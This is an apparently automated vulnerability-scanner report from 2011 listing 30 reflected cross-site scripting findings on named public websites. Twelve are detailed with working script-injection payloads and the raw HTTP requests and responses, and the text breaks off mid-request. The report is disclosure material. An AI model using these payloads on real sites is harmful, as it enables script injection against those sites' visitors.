XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10132011-01

Report generated by XSS.CX at Thu Oct 13 06:51:09 CDT 2011.


Loading


1. Cross-site scripting (reflected)

1.1. http://www.reputation.com/company [REST URL parameter 1]

1.2. http://www.reputation.com/contact [REST URL parameter 1]

1.3. http://www.reputation.com/favicon.ico [REST URL parameter 1]

1.4. http://www.reputation.com/how_to/ [REST URL parameter 1]

1.5. http://www.reputation.com/itemAdded [REST URL parameter 1]

1.6. http://www.reputation.com/min/ [REST URL parameter 1]

1.7. http://www.reputation.com/products [REST URL parameter 1]

1.8. https://www.reputation.com/myreputation [REST URL parameter 1]

1.9. https://www.reputation.com/secure/login [REST URL parameter 2]

1.10. https://www.reputation.com/secure/reg1 [REST URL parameter 2]

1.11. https://www.rogers.com/web/content/SHM_Coming_Soon [REST URL parameter 2]

1.12. https://www.rogers.com/web/content/SHM_Coming_Soon [REST URL parameter 3]

1.13. https://www.rogers.com/web/content/SHM_Coming_Soon [name of an arbitrarily supplied request parameter]

1.14. http://www.rpxcorp.com/ [name of an arbitrarily supplied request parameter]

1.15. http://www.segway.com/ [name of an arbitrarily supplied request parameter]

1.16. http://www.silverspringnet.com/search.php [name of an arbitrarily supplied request parameter]

1.17. http://www.spotmixer.com/create_video/home [name of an arbitrarily supplied request parameter]

1.18. http://www.spotmixer.com/create_video/register [name of an arbitrarily supplied request parameter]

1.19. http://www.ss8.com/login-lost-password.php [name of an arbitrarily supplied request parameter]

1.20. http://www.ss8.com/login.php [name of an arbitrarily supplied request parameter]

1.21. http://www.ss8.com/user-registration.php [name of an arbitrarily supplied request parameter]

1.22. http://www.ventureloop.com/ventureloop/job_search.php [kword parameter]

1.23. http://www.veracyte.com/base/login.phpx [REST URL parameter 1]

1.24. http://www.veracyte.com/base/login.phpx [REST URL parameter 2]

1.25. http://www.whatstyle.net/ [name of an arbitrarily supplied request parameter]

1.26. http://x3show.mevio.com/ [name of an arbitrarily supplied request parameter]

1.27. http://www.sportsauthority.com/ [Referer HTTP header]

1.28. http://www.spotmixer.com/create_video/customer_service [Referer HTTP header]

1.29. http://www.toysrus.com/ [Referer HTTP header]

1.30. http://www.ss8.com/account.php [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 30 instances of this issue:


1.1. http://www.reputation.com/company [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /company

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 311fa'><script>alert(1)</script>0f53d7843a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /311fa'><script>alert(1)</script>0f53d7843a9 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reputation.com/contact
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; WRIgnore=true; ysm_CK=ysm_PV:2&ysm_SN:1318504702183&ysm_LD:0; _mkto_trk=id:055-ZCQ-783&token:_mch-reputation.com-1318504724671-73074; shoppingCart=7tf752h2dmdhc4lgae8ell2b57; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.5.9.1318504798636; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:21:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:21:01 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 39061
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiring people interested in source code http
...[SNIP]...
<iframe src='http://t.reputation.com/311fa'><script>alert(1)</script>0f53d7843a9' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.2. http://www.reputation.com/contact [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /contact

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29efa'><script>alert(1)</script>f4dd780797b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /29efa'><script>alert(1)</script>f4dd780797b HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; ysm_CK=ysm_PV:2&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.2.10.1318504702; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WRIgnore=true; _mkto_trk=id:055-ZCQ-783&token:_mch-reputation.com-1318504724671-73074; shoppingCart=7tf752h2dmdhc4lgae8ell2b57

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:20:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:20:18 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 39061
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiring people interested in source code http
...[SNIP]...
<iframe src='http://t.reputation.com/29efa'><script>alert(1)</script>f4dd780797b' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.3. http://www.reputation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2b1'><script>alert(1)</script>32b5bf1b952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8d2b1'><script>alert(1)</script>32b5bf1b952 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; shoppingCart=7tf752h2dmdhc4lgae8ell2b57; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; ysm_CK=ysm_PV:1&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.1.10.1318504702; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:18:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:18:31 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 39061
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiring people interested in source code http
...[SNIP]...
<iframe src='http://t.reputation.com/8d2b1'><script>alert(1)</script>32b5bf1b952' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.4. http://www.reputation.com/how_to/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /how_to/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a01b8'><script>alert(1)</script>f41bb64167 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a01b8'><script>alert(1)</script>f41bb64167/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; ysm_CK=ysm_PV:1&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.1.10.1318504702; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); shoppingCart=7tf752h2dmdhc4lgae8ell2b57

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:20:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:20:00 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 39061
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiring people interested in source code http
...[SNIP]...
<iframe src='http://t.reputation.com/a01b8'><script>alert(1)</script>f41bb64167/' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.5. http://www.reputation.com/itemAdded [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /itemAdded

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 581e2'><script>alert(1)</script>47043ee47e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /581e2'><script>alert(1)</script>47043ee47e5?bundleAdded=1892 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; WRIgnore=true; ysm_CK=ysm_PV:2&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.7.9.1318504798636; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:055-ZCQ-783&token:_mch-reputation.com-1318504724671-73074; shoppingCart=7tf752h2dmdhc4lgae8ell2b57

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:27:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:27:53 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 39161
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiring people interested in source code http
...[SNIP]...
<iframe src='http://t.reputation.com/581e2'><script>alert(1)</script>47043ee47e5' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.6. http://www.reputation.com/min/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b06f9'><script>alert(1)</script>ee7a096cab8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b06f9'><script>alert(1)</script>ee7a096cab8/?g=Ly9jc3MvZW4vZ2xvYmFsLmNzcw==&rdc=1&1317945051 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.reputation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; shoppingCart=7tf752h2dmdhc4lgae8ell2b57; abg_livechat_a=livechat_b

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:18:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:18:15 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 39062
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiring people interested in source code http
...[SNIP]...
<iframe src='http://t.reputation.com/b06f9'><script>alert(1)</script>ee7a096cab8/' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.7. http://www.reputation.com/products [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /products

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c58b'><script>alert(1)</script>8fcc46ea593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8c58b'><script>alert(1)</script>8fcc46ea593 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; ysm_CK=ysm_PV:1&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.1.10.1318504702; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); shoppingCart=7tf752h2dmdhc4lgae8ell2b57

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:20:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:20:00 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 39061
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiring people interested in source code http
...[SNIP]...
<iframe src='http://t.reputation.com/8c58b'><script>alert(1)</script>8fcc46ea593' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.8. https://www.reputation.com/myreputation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.reputation.com
Path:   /myreputation

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b0c4'><script>alert(1)</script>cf09d0f1d85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myreputation6b0c4'><script>alert(1)</script>cf09d0f1d85 HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reputation.com/products
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; ysm_CK=ysm_PV:2&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.2.10.1318504702; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WRIgnore=true; _mkto_trk=id:055-ZCQ-783&token:_mch-reputation.com-1318504724671-73074; shoppingCart=7tf752h2dmdhc4lgae8ell2b57

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:20:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:20:21 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 73227
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!-- Elapsed Time: 0.17301797866821 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<!-- We're hiri
...[SNIP]...
<iframe src='https://t.reputation.com/myreputation6b0c4'><script>alert(1)</script>cf09d0f1d85' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.9. https://www.reputation.com/secure/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.reputation.com
Path:   /secure/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 618f0'><script>alert(1)</script>25b56d54147 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure/login618f0'><script>alert(1)</script>25b56d54147 HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.reputation.com/myreputation
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; ysm_CK=ysm_PV:2&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.2.10.1318504702; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WRIgnore=true; _mkto_trk=id:055-ZCQ-783&token:_mch-reputation.com-1318504724671-73074; shoppingCart=7tf752h2dmdhc4lgae8ell2b57

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:20:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 27336
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<iframe src='https://t.reputation.com/secure/login618f0'><script>alert(1)</script>25b56d54147' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.10. https://www.reputation.com/secure/reg1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.reputation.com
Path:   /secure/reg1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f2df3'><script>alert(1)</script>1b7cf0cc3e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure/reg1f2df3'><script>alert(1)</script>1b7cf0cc3e1 HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reputation.com/company
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7tf752h2dmdhc4lgae8ell2b57; uuid=4e96c8d3daf9e; country=USA%2C50.23.123.106; lang=en; region=USA; retargeter=generic; abg_livechat_a=livechat_b; WRUID=1342113706.2097225487; WRIgnore=true; shoppingCart=7tf752h2dmdhc4lgae8ell2b57; ysm_CK=ysm_PV:2&ysm_SN:1318504702183&ysm_LD:0; __utma=1.562462958.1318504702.1318504702.1318504702.1; __utmb=1.6.9.1318504798636; __utmc=1; __utmz=1.1318504702.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:055-ZCQ-783&token:_mch-reputation.com-1318504724671-73074

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:21:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=7tf752h2dmdhc4lgae8ell2b57; expires=Mon, 13-Oct-2014 11:21:25 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 16751
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<iframe src='https://t.reputation.com/secure/reg1f2df3'><script>alert(1)</script>1b7cf0cc3e1' style='display:none;padding:0;margin:0' width='0' height='0'>
...[SNIP]...

1.11. https://www.rogers.com/web/content/SHM_Coming_Soon [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.rogers.com
Path:   /web/content/SHM_Coming_Soon

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71c2a"><img%20src%3da%20onerror%3dalert(1)>8605f7417b8 was submitted in the REST URL parameter 2. This input was echoed as 71c2a"><img src=a onerror=alert(1)>8605f7417b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web/content71c2a"><img%20src%3da%20onerror%3dalert(1)>8605f7417b8/SHM_Coming_Soon HTTP/1.1
Host: www.rogers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 13 Oct 2011 11:04:23 GMT
Server: Apache
Set-Cookie: TLTSID=1B6974B2F58B10F5026592A23484D62A; Path=/; Domain=.rogers.com
Set-Cookie: TLTUID=1B6974B2F58B10F5026592A23484D62A; Path=/; Domain=.rogers.com; Expires=Thu, 13-10-2021 11:04:23 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48509

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>This page cannot be found - 404 Error</title>
<SCRIPT LANGUA
...[SNIP]...
<a href="/web/content71c2a"><img src=a onerror=alert(1)>8605f7417b8/SHM_Coming_Soon;jsessionid=hCS3TWFXn8GYhZtpXtGGy2fGlh7xppj4VQxzz8jh1Vy3x49zs42B!506780405?_nfpb=true&amp;_pageLabel=Home&amp;_nfls=true&amp;setLanguage=fr">
...[SNIP]...

1.12. https://www.rogers.com/web/content/SHM_Coming_Soon [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.rogers.com
Path:   /web/content/SHM_Coming_Soon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6d53"%3b4fb4a7d75e9 was submitted in the REST URL parameter 3. This input was echoed as f6d53";4fb4a7d75e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/content/SHM_Coming_Soonf6d53"%3b4fb4a7d75e9 HTTP/1.1
Host: www.rogers.com
Accept: */*
Accept-Language: en
